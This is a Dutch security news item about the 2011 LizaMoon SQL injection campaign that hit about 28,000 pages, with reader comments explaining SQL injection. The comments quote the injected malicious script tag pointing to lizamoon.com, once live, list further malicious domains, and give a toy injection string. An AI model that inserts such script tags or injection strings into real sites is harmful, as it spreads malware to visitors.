image

Grootschalige aanval op 28.000 webpagina's

woensdag 30 maart 2011, 15:27 door Redactie, 13 reacties

Ruim 28.000 webpagina's zijn het doelwit van een grootschalige SQL Injectie-aanval geworden, waarbij de aanvallers kwaadaardige code injecteerden. De code zorgt ervoor dat bezoekers van de pagina naar een website worden doorgestuurd die een nep-virusscanner aanbiedt.

Onder de aangevallen pagina's bevinden zich ook enkele iTunes pagina's. Het gaat om aangeboden podcasts. Volgens beveiligingsbedrijf Websense is de RSS/XML feed die Apple gebruikt gecompromitteerd. Aangezien iTunes de script tags encodeert, werkt het script niet op de computer van bezoekers.

Reacties (13)
30-03-2011, 16:10 door Anoniem
Wat houdt dat eigenlijk in, een SQL?
30-03-2011, 17:48 door Anoniem
Ga naar:
www.google.com

Type in:

SQL

en klik op de ZOEK knop.

Oftewel gebruik je verstand eens ipv dit soort flauwekul vragen te stellen ...
30-03-2011, 17:52 door Anoniem
Gaat wel heeeeel snel nu.

Ongeveer 81.300 resultaten als je naar het script zoekt in gooogle.

<script src=hxxp://lizamoon.com/ur.php></script>
30-03-2011, 18:05 door rodin
Door Anoniem: Wat houdt dat eigenlijk in, een SQL?

In het kort (en nogal versimpelt):

SQL is de taal waarmee opdrachten worden verstuurd naar een database. Bijvoorbeeld
geef mij alle gegevens van het nieuwe album van Lady GaGa
Deze gegevens worden dan in een mooie webpagina gestoken en naar uw browser gestuurd.

Een probleem waar veel websites mee kampen is dat het mogelijk is voor hackers om hun eigen SQL opdrachten te sturen. Een hacker vraagt bijvoorbeeld het album op van 'Lady GaGa, oh en ook het wachtwoord van de beheerder graag'. Dit wordt uiteindelijk de SQL opdracht:
geef mij alle gegevens van het nieuwe album van Lady GaGa, oh en ook het
wachtwoord van de beheerder graag
Aangezien computers dom zijn, wordt deze aanvraag gewoon uitgevoerd en krijgt de hacker netjes het wachtwoord van de beheerder voor zijn neus.

Zo'n aanval heet 'SQL injection'.
30-03-2011, 19:07 door Anoniem
@ rodin
Deze uitleg is zodanig versimpelD dat er geen touw aan vast te knopen is. Misschien kan iemand anders het beter uitleggen?
30-03-2011, 20:37 door Anoniem
Dan haal je toch gewoon Lady Gaga van de server af? Probleem opgelost!
31-03-2011, 07:51 door Syzygy
Maar hij vraagt wat SQL is :

Quote WIKI: SQL (Structured Query Language) is een ANSI/ISO-standaardtaal voor een relationeel 'database management systeem' (DBMS). Het is een gestandaardiseerde taal die gebruikt kan worden voor taken zoals het bevragen en het aanpassen van gegevens in een relationele databank. SQL kan met vrijwel alle moderne relationele databankproducten worden gebruikt.

Om het voorbeeld van boven nog even te verduidelijken:
Stel je hebt een database met klanten gegevens (denk daarbij even aan een tabel zoals je in Excel maakt bijvoorbeeld).
Daar in staan gegevens van klanten (in kolommen en regels) waaronder de kolommen : Achternaam -Voornaam - Adres - Huisnummer - Postcode -Woonplaats - Land
Onder Achternaam vind je dan alle achternamen van alle klanten , onder Adres de bijbehorende adressen etc.

Als nu een applicatie (bijvoorbeeld een softwarepakket dat stickers voor de post wil afdrukken) die informatie nodig heeft dan "praat" deze in SQL code tegen die Database om zo de benodigde gegevens op te halen.
Voorbeeld; je wil bovenstaande gegevens uit de Tabel genaamd "KLANTEN" halen :

SELECT Voornaam, Achternaam , Adres, Huisnummer, Postcode,Woonplaats, Land FROM Klanten

Dus je vraagt de inhoud van de kolommen: Voornaam, Achternaam , Adres, Huisnummer, Postcode,Woonplaats, Land uit de tabel "Klanten" te halen.

Die zin noemen ze dus een "SQL Statement".

Op deze manier kun je ook een Database (Tabel) vullen of aanpassen.

Basis SQL is niet moeilijk om te leren.
Met gebruik van Cursors en zo wordt het wat ingewikkelder
31-03-2011, 08:13 door jaapd
Zo'n hack kan in het eenvoudigste geval door b.v. in het naamveld in te typen:
Jaap"; select * from password;
en als het beroerd genoeg geprogrammeerd wordt zie je de wachtwoorden langskomen.
01-04-2011, 00:36 door Bitwiper
18. zo simpel is simyo

"Bestellen </title><script src=http://lizamoon.com/ur.php></script>, Inloggen </title><script src=http://lizamoon.com/ur.php></script> ..."
faq.simyo.nl/
Nog een paar NL sites: www.vrijzinnigen.nl, www.tuinplant.nl, www.relatiegeschenk.nl, www.adverterenisgratis.nl.

Naast verwijzingen naar lizamoon.com zie ik ook:
hxxp://google-stats48.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://general-st.info/ur.php
hxxp://online-guest.info/ur.php
hxxp://system-stats.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://mol-stats.info/ur.php
hxxp://ave-stats.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://online-stats201.info/ur.php
hxxp://social-stats.info/ur.php
hxxp://multi-stats.info/ur.php
hxxp://world-stats598.info/ur.php
hxxp://t6ryt56.info/ur.php
01-04-2011, 12:16 door Anoniem
"Oftewel gebruik je verstand eens ipv dit soort flauwekul vragen te stellen ..."

Niet iedereen hier heeft verstand van zaken als SQL. Wat dat betreft is eerder jouw reactie nogal flauw te noemen. Misschien zou het aardig zijn indien de redactie zo'n term linkt naar de WikiPedia entry over SQL.
[admin] Bedankt, is inderdaad handig [/admin]
01-04-2011, 17:00 door [Account Verwijderd]
[Verwijderd]
04-04-2011, 16:16 door Anoniem
@anoniem

Iemand neemt de moeite om jou uit te leggen hoe SQL grofweg in elkaar steekt en jij hebt daar kritiek op, omdat het niet duidelijk genoeg is? Is de uitleg van hoe je Google moet gebruiken ook niet duidelijk genoeg? Blijkbaar weet je dat er een Wikipedia pagina bestaat, dus waarom moet admin tijd besteden om een linken te maken? (dat zou namelijk dan voor alle gebruikelijke computertermen moeten en niet alleen die "anoniem" niet begrijpt)

Misschien zijn sommige dingen niet in een reactie uit te leggen heb je daar al over nagedacht. Je kunt ook naar de bibliotheek, daar zijn boeken vol geschreven over SQL en ja, er is waarschijnlijk ook een SQL voor Dummies.

Ik weet niet hoe oud je bent, maar je bent nooit te oud om het volgende te leren: in de computer wereld is het onbeleefd om alles te vragen. Wanneer Google niet helpt, dan kun je een vraag stellen en vaak worden er dan alleen tips gegeven. Dit is niet gemeen of onbeleefd, want als je naar aanleiding van tips zelf ontdekt hoe een systeem werkt, dan begrijp je het systeem ook echt.

Tell me and I will forget
Show me and I may remember
Involve and I will understand

Vandaar nu een tip over SQL om je te "involven", kijk eens naar databases (zoals Microsoft Access) en dynamische websites (in PHP definitie niet die van Javascript). Daar wordt SQL veel voor gebruikt. Het is een computertaal die databases aanspreekt.
05-04-2011, 09:50 door [Account Verwijderd]
[Verwijderd]
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.